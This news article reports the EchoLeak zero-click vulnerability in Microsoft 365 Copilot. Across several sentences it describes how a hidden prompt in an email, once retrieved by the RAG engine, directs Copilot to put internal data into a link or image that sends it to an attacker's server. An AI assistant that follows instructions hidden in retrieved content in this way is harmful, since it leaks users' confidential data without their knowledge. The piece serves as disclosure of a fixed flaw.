San Francisco, June 12: The Microsoft 365 Copilot AI agent was detected as having a major security flaw that could allow cyber-attackers to steal the data of the users without their interactions via email. Security researchers discovered the first zero-click vulnerability called "EchoLeak" and classified it as "CVE-2025-32711", which let the attackers access sensitive data by sending emails to the targets. The security flaw was detected in January 2025 by Aim Labs, and after that, the team reported it to Microsoft.
In May 2025, the tech giant fixed the EchoLeak vulnerability server-side and confirmed that no customers were impacted. Due to the fix released by Microsoft, users did not have to take any action from their side. Microsoft also said that despite Aim Labs finding the security flaw, there was no evidence of attackers using it for real-world attacks. Meta V-JEPA 2: Meta Introduces Advanced 1.2 Billion-Parameter World Model for Visual Understanding, Prediction for Robot Interaction With Unfamiliar Objects, Environment.
However, the company acknowledged that it was a major turning point for AI security. According to reports, EchoLeaks is considered to be the first-ever zero-click vulnerability that affected LLM (large language model) Copilot AI.
How Did 'EchoLeak' Vulnerability Work in Microsoft 365 Copilot AI
EchoLeak vulnerability could allow an attacker to steal sensitive information from the target (victim) with the help of an email. An attacker could send a professional email with normal-looking text that could contain hidden prompts. It could confuse Microsoft 365 Copilot AI assistant. After that, the Copilot users could ask questions related to the same topic sent via email, and the system would retrieve an early email via the RAG (Retrieval-Augmented Generation) engine. Manus Chat Mode: Manus AI Launches Free, Unlimited Chat To Get Instant Answer on Questions, Create Comprehensive Outputs.
After that, the hidden prompt is activated and directs the Copilot AI to extract the internal data and input it to the link or image without letting the users know. The browser automatically accesses the embedded link and sends the users' internal data to the attacker's server. Although Microsoft fixed the EchoLeak vulnerability, it posed a greater threat called "LLM Scope Violations'. The security flaw directed the AI tool to leak data without consent and alert the user. Aim Labs marked this flaw as dangerous for enterprises having integrated artificial intelligence systems.
(The above story first appeared on LatestLY on Jun 12, 2025 02:03 PM IST. For more news and updates on politics, world, sports, entertainment and lifestyle, log on to our website latestly.com).